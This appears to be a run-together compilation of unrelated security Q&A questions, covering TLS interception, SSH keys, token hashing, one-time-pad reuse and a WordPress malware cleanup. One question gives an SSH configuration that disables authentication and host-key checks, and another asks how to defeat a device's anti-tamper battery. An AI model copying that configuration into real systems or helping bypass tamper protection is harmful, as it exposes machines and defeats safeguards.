My GF just told me she just sent some of her personal info over an email. She was trying to send her folks some documents. I guess the documents had some sensitive info on them, like her full name, SSN#, etc. The email was not encrypted. How at risk is she and what should she do from here? She is freaking out.
I'm currently following a small game to get more familiar with Linux and security and got the following task: The password for the next level is stored in /etc/bandit_pass/bandit14 and can only be read by user bandit14. For this level, you don't get the next password; instead, you get a private SSH key that can be used to log into the next level. Note: localhost is a hostname that refers to the machine you are working on. For now I'm logged in as user bandit13 on the machine where user bandit14 exists, and I have the private key. When executing the ssh -i command on the machine (logged in as bandit13) I get access to the bandit14 account: ssh bandit14@server.org -i privatekeyfile Now what bothers me is: can someone log into a user account just by using the given SSH private key from any remote client? I tried to log in from my own system; however, the server refused my key. I tried with PuTTY on Windows and with the terminal on Mac OS X (with the same command). From what I know, the associated public key needs to be put into the authorized_keys file on the server (i.e. the machine that gets accessed). But why does logging in from the remote machine not work, while it works from the local one? Note: The public key is unknown; I have no access to the authorized_keys file on the server.
I'm trying to understand SSL/TLS. What follows is a description of a scenario and a few assumptions which I hope you can confirm or refute. Question How can my employer be a man-in-the-middle when I connect to Gmail? Can he at all? That is: is it possible for the employer to decrypt the connection between the browser on my work computer and the employer's web proxy server, read the data in plain text (for instance for virus scans), re-encrypt the data, and send it to Google without me noticing? Browser on employee's computer <--> employer's web proxy server <--> Gmail server The employer can install any self-signed certificate on the company computers. It's his infrastructure, after all. Scenario: what I am doing With a browser, open http://www.gmail.com (notice http, not https) I get redirected to the Google login page: https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue=https://mail.google.com/mail/&ss=1&scc=1&ltmpl=default&ltmplcache=2&emr=1 I enter my username and password I get redirected to Gmail: https://mail.google.com/mail/u/0/?pli=1#inbox I click on the SSL lock icon in the browser... ...and see the following: Issued to: mail.google.com Issued by: "employer company name" Valid from: 01.01.2014 - 31.12.2014 Certification path: "employer company name" --> "employer web proxy server name" --> mail.google.com Assumption I'm now assuming that the SSL lock icon in the browser turns green, but in fact I don't have a secure connection from the browser to the Gmail server. Is that correct? Sources I've read these sources but still don't quite understand it: Is there a method to detect an active man-in-the-middle? Preventing a spoofing man in the middle attack? How does SSL/TLS work? Summary Is it possible for someone to be a man-in-the-middle if that someone controls the IT infrastructure? If so, how exactly? Are my login and password read in plain text on the employer's web proxy server?
What should I check in the browser to verify that I have a secure connection from the browser all the way to the Gmail server? EDIT, 18.07.2014 Privacy is not a concern. I'm just curious about how TLS works in this particular scenario. What other means the employer has to intercept communication (keylogger etc.) are not relevant in this particular case. Legal matters aren't a concern. Employees are allowed to use company IT equipment for private communication within certain limits. On the other hand, the employer reserves the right to do monitoring without violating privacy.
How could I decrypt a file (encrypted with AES-128) using OpenSSL? I do not remember the passphrase I used to encrypt it, but I saved the key that was generated and used to encrypt my file. How can I use this key to decrypt my file?
I am connected to my chat accounts via Empathy, a messaging program, and it has my password stored in it. I am really curious to know how it stores the passwords, and whether they can be retrieved in plain text.
If you have a REST API where logging in from the client side generates an access token, which is then stored in local storage and used for all authentication from that point on: is it secure to keep using the same access token? Say you generate the access token, store it in the database, and keep using it until the client actively presses log out. If not, what would be the requirements to make this secure?
I'm unable to understand how arbitrary code execution vulnerabilities are supposed to work. Wikipedia mentions: Arbitrary code execution is commonly achieved through control over the instruction pointer of a running process. Say the vulnerability is triggered by some maliciously crafted file that said process is reading. How could it modify the instruction pointer, or otherwise corrupt the internal state of the application, so as to cause it to execute the attacker's code? Also, given that modern OSes implement DEP and ASLR, how is this even feasible? The data loaded by the application would not even be executable, and additionally it's difficult to determine the offset of the shellcode/payload. Brownie points for showing a small snippet of code that would be vulnerable to such an exploit.
I saved traffic from Wireshark into a file with dumpcap. In this file I have, for example: € X `þ $À6 @ íëÃNxXÀ¨£ P&E»kKí¨<`PEà; HTTP/1.1 200 OK Cache-Control: private And I want to see only: HTTP/1.1 200 OK Cache-Control: private I'm on Windows 7 and I use these commands: cd\pro* cd wires* tshark -D dumpcap -i 5 -s 96 -w packets.cap
Is it recommended to use both protocols together? In which situations?
We are currently using EasyRSA and OpenSSL to manage our user VPN certificates for OpenVPN. The process we have in place currently is: User generates a CSR on their laptop and sends it to us to sign We copy the CSR to the server, sign it, and return the signed CRT to the user We usually leave a copy of the CSR and CRT on the server When a user's cert is revoked, we store this information in a CRL I'm tasked with auditing who has access to the VPN. As far as I can tell, the only way we can check who has access is by listing all of the CRTs on the server and subtracting the revoked CRTs as listed in the CRL. However, this strikes me as not at all sound, as if anyone deleted a CRT and CSR from the server, we would have no way of knowing that it had ever been signed. Is the current method trustworthy? If not, is there any way to know exactly which certs that were signed are still valid?
What's the point of spotlighting wget in Heartbleed dumps? I'm specifically talking about this, which is the first page of wget occurrences in Heartbleed dumps. They put this page as a link at the top of the main page, as if it were relevant in some way. I can understand the reason behind exposing email= and password= and bitcoin and so on, but what about wget? Is it because it might reveal system paths or potential RCIs, or is it because it exposes a system with Heartbleed, and thus wget, which is shown to be used, is also vulnerable to it?
I just visited a forum, and a member knew what OS I was running without me saying anything (a not-too-common distro of Linux). Now I'm not sure how exactly he might have done it, or what information he might have been able to get, but for starters I'm guessing that, besides information on my OS, they might have been able to determine other things such as my IP address, general location, browser, and even browser cookies. Whether or not it was necessary, I deleted my browser, performed a scan with both chkrootkit and rkhunter, and will never go back to that site. Heck, I'm wondering if by posting here so soon after, I'm putting myself at risk. I guess the questions burning in my mind are: can they pose a threat to others in my network, assuming there is a firewall and WPA2 security? I don't have any real important information on my system, and I don't really do anything that might put me at real risk besides the odd online purchase, but I don't know what others might have on their systems. Should I be able to keep doing those things normally until I see something weird? Besides what I already mentioned, what other steps should someone in this situation take?
So, a bit of context before I start may be handy. I am developing a Java desktop application which will use an SQLite database to store/process data. The application will utilize authentication to access the program for editing data, adding/deleting data, etc. But I don't want an attacker to be able to pull the laptop's hard drive and access the data without first authenticating to Windows. My question is: if I were to encrypt certain data before inserting it into the SQLite database with, say, AES-256, is it possible to decrypt the data without the user having to enter a password AND without hardcoding the password in the application? I really think the overhead of the user having to remember two passwords (one for application authentication and one for database encryption/decryption) is infeasible, because if they forget the encryption/decryption password, their data is gone. Have any of you come across any solutions that you can share, or can you suggest some ideas that may be of help?
A framework for modeling password management risks and costs, and the beginnings of a good strategy for users to help them manage passwords for their often large portfolios of accounts is outlined in the paper Password Portfolios and the Finite-Effort User: Sustainably Managing Large Numbers of Accounts | USENIX Security 2014 (note the full pdf text is already available). It is covered e.g. at Mathematics makes strong case that “snoopy2” can be just fine as a password | Ars Technica Microsoft researchers: Re-use the same password across sites likely to be hacked | Network World Basically, since it is impossible for users to remember good, unique passwords for dozens or hundreds of different accounts, and since some accounts have low risks to the user if they are compromised (e.g. passwords to log in to a newspaper site to read stories), they explain that "password re-use can be part of a coping strategy". They suggest that people can group together accounts with high value plus low probability of compromise, and those with low value plus high compromise probability, and reuse the same password within each group. Their analysis covers password managers, which shift some of the risks around, to some degree also. On that topic see also How to evaluate a password manager?. I'll add that hybrid strategies can also make sense, e.g. using a password manager for some groups of accounts. They note the need to understand and explain how users can trade off user effort at remembering passwords with the probability that the password is compromised. This site has gathered some wisdom relative to that: What is your way to create good passwords that can actually be remembered? They also note the need for future study to understand, model and explain the losses due to compromises of various types of accounts. 
So my question for the risk-management experts and those adept at explaining things in ways that connect with users is, how can we best help users understand the kinds of risks they face if accounts of various types are compromised? E.g. compromise of a password for an online bitcoin wallet presumably means the unrecoverable loss of all the bitcoins stored there. But compromise of the password for reading articles on a newspaper site may have little or no meaningful impact on the user, and in fact some groups of users try to share accounts and passwords for these sorts of sites with their friends. Other kinds of accounts are traditional banks (with some hope of recovery of stolen funds), social media, email, work-related passwords, web services, wifi access, encryption keys, etc. Sometimes the losses may not be obvious to the users (e.g. risks of identity theft, reputation loss, etc).
I want to have a simple application that is in .exe (executable) format hosted on a secure domain that, on my website, a user can click to download and run. However, I'm aware that many annoying viruses are in the form of a harmless-looking executable, so I naturally would want to also put, as a small notice for that download, something like "Not a virus - trust me at your own will". But this leads me to a certain concern. How, if possible, could that executable become infected? Is what I'm thinking of doing stupid? If so, what is a better alternative? What precautions should I take? The last thing I want is for a file of mine to become infectiously corrupted and to have the possibility of it messing with others (though Linux users are more or less safe).
Soon I will be acquiring the event logs of the systems my company produces and expected to audit them. Multiple logs are generated from each computer and there are multiple operating systems to audit. The systems are isolated from the internet and have a significant amount of physical security, not to mention there isn't a whole lot of conventionally useful data to obtain from them anyway. Am I wrong to feel it is unreasonable and unproductive to be examining these logs? I am under the impression that any potentially malicious activity isn't necessarily going to be obvious just by looking at the logs, if it can even be detected at all. Since it seems I can be on the hook if an unreported incident was discovered, how can I possibly analyze the overwhelming amount of information headed my way without changing my job title to 'Event Log Reader'? Does software exist that can help?
I bought a domain a few days ago, but it came to my attention that my domain has been blacklisted by many antivirus programs and search engines, as the domain was previously owned by somebody who misused it. Though I have asked a few antivirus companies and search engines to review the domain, I want to know what else I should do to get this fixed. Also, what type of security certificate should I buy, and from where? Please tell me the process in detail for buying a security certificate, and the best ways to get my domain name removed from the blacklists.
I was looking through the OpenSSL vulnerabilities list and came across CVE-2010-5298 listed as a 2014 vulnerability. At http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5298, under Date Entry Created, it says 20140414. However, http://cve.mitre.org/cve/identifiers/syntaxchange.html clearly shows that format as CVE-YYYY-NNNN: The CVE-ID Syntax Change took effect on January 1, 2014. New CVE-ID Syntax The new CVE-ID syntax is variable length and includes: CVE prefix + Year + Arbitrary Digits IMPORTANT: The variable length arbitrary digits will begin at four (4) fixed digits and expand with arbitrary digits only when needed in a calendar year, for example, CVE-YYYY-NNNN and if needed CVE-YYYY-NNNNN, CVE-YYYY-NNNNNNN, and so on. This also means there will be no changes needed to previously assigned CVE-IDs, which all include 4 digits. I thought the year was always reflected in the CVE ID. What happened in this case? Is this a common occurrence?
I'm new to SSL/TLS and was wondering if you could walk me through the following scenario. Scenario Let's say I am one of a thousand websites that has a certificate signed by some certificate authority (CA). Everything is fine. Breach Then some evil hacker steals the CA's private key. Now, all of a sudden, all thousand websites' certificates are untrustworthy, because the hacker can issue certificates signed with the stolen private key and one can't distinguish between real and fake certificates anymore. The CA revokes its stolen certificate, so I end up with a website that no browser recognizes as trustworthy anymore. Mitigation What do I do now? I've read these questions: What can an attacker do with a stolen SSL private key? What should the web admin do? What happens when an Intermediate CA is revoked? Now I've got to run and get a new certificate signed by a still-trusted CA. Question Therefore, I was wondering: what should I have done in advance so that once the CA's private key is stolen, I don't have to run, but can lean back and not worry about it? Should I have a second certificate ready, signed by another CA, which I can deploy once the first one becomes untrustworthy? Can my old certificate be simultaneously signed by a second CA so that it stays valid even if one CA's private key is compromised? What mitigation scenarios are there? Real cases The question came up after reading these cases: Microsoft revokes trust in certificate authority operated by the Indian government DigiNotar Comodo Group Issues Bogus SSL Certificates
Homework question The full question is the following: Suppose you are told that the one-time pad encryption of the message "attack at dawn" is 09e1c5f70a65ac519458e7e53f36 (the plaintext letters are encoded as 8-bit ASCII and the given ciphertext is written in hex). What would be the one-time pad encryption of the message "attack at dusk" under the same OTP key? To me it seems that all you'd have to do is find the hexadecimal representation of "attack at dusk", add (XOR) that to the "attack at dawn" message, and then use the key to convert "attack at dusk" to an encrypted value. However, I don't know how to store the hexadecimal value in C++ (or any language for that matter). This is what I thought you would do: std::string attackAtDawn = "61747461636b206174206461776e";
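To check my understanding of the arithmetic, here is a quick sketch in Python rather than C++, just to verify the bytes: since a one-time pad "add" over bits is XOR, the key can be recovered from the known plaintext/ciphertext pair and reused on the new message.

```python
# Recover the pad from the known pair, then encrypt the new message.
ct_dawn = bytes.fromhex("09e1c5f70a65ac519458e7e53f36")
pt_dawn = b"attack at dawn"
pt_dusk = b"attack at dusk"

# key = ciphertext XOR plaintext (OTP encryption is just XOR)
key = bytes(c ^ p for c, p in zip(ct_dawn, pt_dawn))

# New ciphertext = key XOR new plaintext; only the last bytes change,
# because the two messages share the prefix "attack at d".
ct_dusk = bytes(k ^ p for k, p in zip(key, pt_dusk))
print(ct_dusk.hex())  # prints 09e1c5f70a65ac519458e7f13b33
```

Only the bytes covering "usk" differ from the original ciphertext, which also illustrates why reusing a pad leaks information.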
First of all, I apologize if these questions can be answered using a web search, but I'm sort of a crypto noob and don't know what to search for. Given N AES-encrypted messages (where the message length is much longer than the key length) and the corresponding N decrypted messages (all encrypted with different keys), is it possible to pair up each encrypted message with its decrypted counterpart? Given one AES-encrypted message and its decrypted counterpart, is it possible to reconstruct the key used for encryption if you know the key is 256 bits? If AES cannot achieve these ends, is there a more suitable symmetric encryption algorithm that can? Edit: I did some research and found the answer to #2. This type of attack is known as a known-plaintext attack, and AES is not known to be susceptible to it.
OK, I've worked with some penetration testing, but it's all done in-house where I work, on a secure network, to secure servers and workstations before they are deployed. My question here is kind of vague on the laws of the U.S. I want to show my girlfriend's son, who is interested in my line of work, some examples of hacking, but I cannot bring him to where I work because they live two hours away from me. So my question is: would it be illegal for me to set up one of my personal servers or computers on my home network and then actually hack into it from her house, within the same state? I would be using only my personally owned equipment (i.e., laptop, server, desktop PC, routers and cable modems); the only thing I wouldn't own is the internet connection itself, which is owned and controlled by Bright House Networks.
Until yesterday I never saw any warnings on secure sites like Twitter and many others, but currently I am getting an exclamation mark in Chrome saying the identity is not verified, even though HTTPS is indeed used. What should I do in this situation? The following are the screenshots: Well, it was resolved today.
Note: This is not an actual situation I'm currently in. Assume your boss is one of those old-fashioned, computer-illiterate managers and wants to store the passwords in plaintext to simplify development. You get 5 minutes to explain the point of hashing passwords. You also know from experience that your boss can be swayed by a good analogy. What analogy would you use to explain to your boss that passwords should be hashed?
I don't clearly understand the technologies behind OpenVPN, so I have a question about OpenVPN security. What if I have a client.p12 (PKCS#12) file and this file was leaked (with its export password) to some evil person? Additionally, this person can dump my encrypted VPN traffic (which was secured with the leaked client.p12 file). Does this mean that dumps of my traffic can be decrypted or attacked via MITM? Or is that not possible, given that the server key wasn't compromised and this evil person can only authorize on the server as me?
From http://msdn.microsoft.com/en-us/library/jj709705.aspx In contrast to the DAC model, which is oriented around objects, the AzMan RBAC model attempts to orient the common administrative experience around user roles. Rather than assigning permissions to objects, an AzMan RBAC framework enables applications to present administrators with a management experience more aligned with the organizational structure of a company. AzMan RBAC provides a central object—a role—that a user is assigned to perform a particular job or application function. Ideally, an RBAC application is designed such that the administrator requires less knowledge of the object storage structure. This approach can be used if the RBAC application provides a simplifying abstraction into resource collections referred to as scopes. Can someone please explain to me how this is any different at all from user/group ACLs? E.g., say I want managers to have read access to /mnt/network_performance_reports, sysadmins to have full read/write access, and everyone else to have no access. I would think that (on Linux with POSIX ACLs; I don't really know Windows) I could: set a default ACL on /mnt so everything under it is effectively chmod 0700 (directories) or 0600 (files); create a sysadmins group and set up a read/write default ACL for sysadmins; create a managers group and set up a read-only default ACL for managers. That's not exactly easy to manage (not centralized, blech!) but it does the same thing, doesn't it? I don't think I'm quite understanding the concept. When people talk about RBAC in operating systems, are they effectively talking about a layer of abstraction on top of MAC/DAC systems to make management of those easier for large organizations? Or are they talking about something that is different internally, i.e. associated with completely different methods and data structures in the OS kernel?
What is the difference between OpenSSL and mkcert? Which one should I prefer? I want to create an IIS-hosted WCF service; which one should I use to create an SSL certificate? Also, there is another option: in IIS we can create a self-signed certificate. Can I use this instead of the one created by mkcert or OpenSSL?
An anti-tampering mechanism of a device relies on detecting tampering while the device is powered down, using energy provided internally by a coin cell. Is there a way to rapidly discharge a coin cell contained in a device without having access to the coin cell or the electronics that use it? I'm trying to think outside the box (probably in a stupid way). What about: microwave effects high/low temperature increase/decrease in humidity X-rays from medical equipment?
I am looking to pen test my application against XSS attacks. The application is a REST API. As such, when you POST some JSON to /cart/add, to see the result of that attack you would need to GET /cart. So far I have figured out how to successfully use the fuzzer to make XSS attacks against my application. However, it expects the response to contain the data it just submitted. I guess what I need is a two-step approach to fuzzing: Make the attack request with POST /cart/add Assert whether the attack was successful by requesting GET /cart Does anyone know how I can do this?
The requirements for a system like the iTunes Store or Google Play are as follows: identify and authenticate the user; determine if the user has paid for a given app; if s/he has, securely transmit the app and install it on the device. What is the strategy used in this situation? In particular, is the app transmitted in an encrypted format or in plaintext?
Years ago computer security analysts Dan Farmer and Wietse Venema wrote the security program S.A.T.A.N. Does anyone know what happened to it (or if it just went out of style) and what people replaced it with, if anything?
I was going to ask about how to educate users, but now that I think about it, I first want to know if it's actually possible to do effectively at all. Are there any amazing success (or horrible failure) stories floating around about user education, and different approaches thereto? Any statistics on whether companies that attempt to educate their user base about computer security are, in fact, less likely to suffer a major compromise? My own experience is that people are often unwilling to alter their usage habits - especially more knowledgeable end users, who assume they know enough to avoid compromise. But my experience here is pretty limited, and based mostly on home/desktop use rather than office/workstation. I'm interested in hearing how this stuff plays out on a larger scale.
I need to set up a scenario where an attacker DoS-attacks port 80 of a server while Snort and other users try to connect to port 80 at the same time. Something like this: 1000 connections to port 80 800 analyzed by Snort 750 detected as a DoS attack by Snort How can I get these values? What tools do I need besides Snort?
I am writing a paper on "The Role of Architecture and Design in Software Assurance" and a commenter asked "Provide a stronger case for using the CWE over the CVE. Explain how CVE vulnerabilities relate to the design phase and static code analysis." As the article is more for software engineers and developers, I am looking for an accurate, clear, and concise explanation that speaks to that audience.
The author of https://stackoverflow.com/a/477578/14731 recommends: DO NOT STORE THE PERSISTENT LOGIN COOKIE (TOKEN) IN YOUR DATABASE, ONLY A HASH OF IT! [...] use strong salted hashing (bcrypt / phpass) when storing persistent login tokens. I was under the impression that login cookies served two purposes: UX benefit: don't ask the user to log in on every request. Performance benefit: don't need to run a slow algorithm (like bcrypt) per request. It seems the author is invalidating the second point, which makes me wonder: why bother with authentication tokens at all? Instead of mapping the username/password to a randomly chosen authentication token, why not simply pass the username/password per request using an httpOnly, secure cookie? Assuming we accept the author's recommendation and use bcrypt per request, what's the advantage of using an authentication token instead of a username/password?
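To make the trade-off I'm describing concrete, here is a rough sketch (Python; the names are mine, not from the linked answer) of why a random token can sit behind a single fast hash while a password cannot: the token is drawn uniformly from a huge space, so an attacker who steals its SHA-256 hash can't feasibly brute-force it, and per-request verification stays cheap.

```python
import hashlib
import secrets

# Sketch: a password needs bcrypt/scrypt because users choose
# low-entropy strings; a 256-bit random token can be protected
# by one fast, unsalted hash and still resist offline guessing.

def issue_token():
    token = secrets.token_urlsafe(32)                         # sent to the client cookie
    stored_hash = hashlib.sha256(token.encode()).hexdigest()  # kept in the DB
    return token, stored_hash

def verify_token(presented, stored_hash):
    digest = hashlib.sha256(presented.encode()).hexdigest()
    return secrets.compare_digest(digest, stored_hash)        # constant-time compare

token, stored = issue_token()
assert verify_token(token, stored)
assert not verify_token("guessed-token", stored)
```

By contrast, sending the username/password on every request would mean either running bcrypt per request or caching the plaintext verdict, and a stolen cookie would expose the long-term credential rather than a revocable token.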
Start with a unique identifier: String macAddress = "CC:3A:61:24:D6:96"; Hash the identifier via an MD5 implementation: String hash = md5(macAddress); //bd37f780e10244cf28810b969559ad5b Remove all letters from the hash: String result = hash.replaceAll("[^\\d.]", ""); result == "3778010244288109695595" I am using MD5 to anonymize MAC addresses from our users. Our current web service does not accept letters for the value I wish to set, so I simply removed the letters. I am wary that this will increase the chances of a collision within our database, so I come here with the question: how likely is it that result will collide for a different macAddress input, compared to the full hash?
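To illustrate the pipeline in runnable form, here is the same sequence of steps sketched in Python (hashlib/re standing in for the Java helpers; since a hex digest never contains a dot, stripping [^\d.] is the same as keeping only the digits):

```python
import hashlib
import re

mac = "CC:3A:61:24:D6:96"

# Step 1-2: MD5 the identifier, as in the Java snippet above
digest = hashlib.md5(mac.encode()).hexdigest()   # 32 hex chars = 128 bits

# Step 3: strip the letters; equivalent to replaceAll("[^\\d.]", "")
# because a hex digest contains no '.' characters
result = re.sub(r"[^0-9]", "", digest)

# Every stripped letter discards information, and the output length
# now varies per input, so collisions are more likely than for the
# full 128-bit digest.
print(len(digest), len(result))
```

On the example digest in the question, bd37f780e10244cf28810b969559ad5b, this keeps 22 of the 32 characters, so the surviving value carries well under the original 128 bits, though for a realistic number of MAC addresses the birthday bound on what remains may still be acceptable.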
I am trying to balance good security practices against excessive logging of user metadata / Personally Identifiable Information. I am constructing a web app that allows for secure messaging. In part of my system design, I am trying to minimize leaking of user metadata. Part of my system design includes a module that tracks IP addresses to prevent abuse, such as Denial-of-Service or account cracking. I only keep the log of IP addresses around as long as needed. A straightforward approach would be to log the IP address and a timestamp in a logfile, and delete entries after a period of time. To head off any distractions, the intent is to ban abusive IP addresses for a set amount of time (i.e., linear offset), not permanently. The threat model is that the logs could be used to determine who was using the system and when. I want the users of this system to have confidence that even if a server is compromised, that the logs are not designed in such a way that a third party could infer who used the system, and when, to talk to whom. My first thought was that storing information in a form that can be verified later, yet not stored in plaintext, is similar to how one securely stores system passwords using a key derivation function (i.e., applying a hash to a passphrase and a salt for a large number of iterations). Thus, the same way that a user password can be verified against its KDF-based hash, an IP can be checked against its KDF-based hash in the log file to see if the same IP address has been logged before. What are the strengths and weaknesses of this approach? Are there superior methods for storing user metadata / PII not in plaintext, in a format that a web app can verify? Updated to clarify web app purpose, and the threat model.
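A sketch of the approach I have in mind (Python; the key value is hypothetical). Note one deliberate deviation from password storage: a per-entry random salt would force re-hashing against every log line on lookup, so this uses a single server-side secret with HMAC, which keeps equal IPs comparable while an attacker without the key cannot simply enumerate the small IPv4 space offline:

```python
import hashlib
import hmac

# Server-side secret; placeholder value -- in practice it would be
# loaded from an HSM/KMS and rotated, since anyone holding it can
# enumerate the IPv4 space and reverse the tags.
SECRET_KEY = b"example-secret-rotate-me"

def ip_tag(ip: str) -> str:
    """Keyed, deterministic tag for an IP: loggable but not plaintext."""
    return hmac.new(SECRET_KEY, ip.encode(), hashlib.sha256).hexdigest()

# Abuse tracking can then match repeat offenders without storing the IP:
entry = (ip_tag("203.0.113.7"), "2014-07-18T12:00:00Z")
assert ip_tag("203.0.113.7") == entry[0]    # same IP maps to the same tag
assert ip_tag("203.0.113.8") != entry[0]    # different IP, different tag
```

The weakness mirrors the strength: the scheme is only as private as the key, and deterministic tags still reveal that the same address appeared twice, which is itself metadata worth expiring on the same schedule as the log.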
So I'm running a private subnet where there is no internet connectivity; I understand the grave danger of running an SSH server on the internet without security. In short, I would like to be able to log into another machine on my subnet without entering a password or fumbling with RSA keys. So passwordless, but not passwordless in the traditional sense. To complicate the matter, I boot over the network, and the mechanism I am using to do so (Warewulf) does not easily allow me to add RSA keys for the root user. So I am looking for a way to disable all SSH security through the sshd_config and ssh_config files. Thanks.
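For reference, this is the sort of configuration sketch I mean by "disable all SSH security". These are my guesses from sshd_config(5) and ssh_config(5), untested, and obviously only defensible on an isolated subnet like this one:

```
# /etc/ssh/sshd_config on the target nodes (trusted, isolated subnet only)
PermitRootLogin yes
PermitEmptyPasswords yes       # allow accounts whose password field is empty
PasswordAuthentication yes

# ~/.ssh/config (or /etc/ssh/ssh_config) on the connecting side
Host 10.0.0.*
    StrictHostKeyChecking no           # skip host-key confirmation prompts
    UserKnownHostsFile /dev/null       # don't record or check host keys
```

As I understand it, the account itself also needs an empty password (e.g. passwd -d root) for PermitEmptyPasswords to matter, and the Host pattern 10.0.0.* is just a placeholder for whatever the subnet actually is.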
I have a customer who wants me to "restore" his WordPress page. I looked a little deeper into the code and found the following snippet a few times in different files: http://pastebin.com/nL4i6t8x I'm not an expert in IT security, but to me this looks pretty much like "encrypted" code that does not belong to WordPress. How can I analyze what this code does? I really need to know what it is before I can "clean" it. I'm interested in learning something about it, so I'm very thankful for explanations of what it is, what it does, where it might come from, and how to remove it. Thanks in advance!